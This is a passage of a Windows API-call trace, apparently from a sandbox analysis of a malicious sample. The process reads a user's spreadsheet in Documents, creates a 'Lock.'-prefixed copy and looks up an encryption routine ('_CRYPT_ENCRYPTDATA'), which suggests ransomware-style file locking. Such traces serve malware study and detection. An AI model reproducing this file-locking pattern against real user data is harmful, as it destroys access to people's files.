lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0259.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0259.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0259.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0259.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0259.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0259.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0259.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/9mu- e5Z.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\9mu- e5z.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0259.667] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.667] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0259.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0259.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0259.667] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0259.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0259.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.669] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0259.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0259.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0259.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0259.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0259.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0259.670] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.9mu- e5Z.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.9mu- e5z.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0259.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0259.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0259.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0259.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0259.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0259.672] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0259.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0259.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0259.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0259.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.674] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5a020 [0259.677] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0259.677] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x42be, lpOverlapped=0x0) returned 1 [0259.678] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be08a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be08a8*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0259.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0259.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42be) returned 0x3bf08b0 [0259.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5a020 | out: hHeap=0x970000) returned 1 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0259.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0259.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42be) returned 0x2f14010 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf08b0 | out: hHeap=0x970000) returned 1 [0259.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.682] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0259.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42be) returned 0x3bf08b0 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf08b0 | out: hHeap=0x970000) returned 1 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.683] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0259.683] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0259.683] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42be) returned 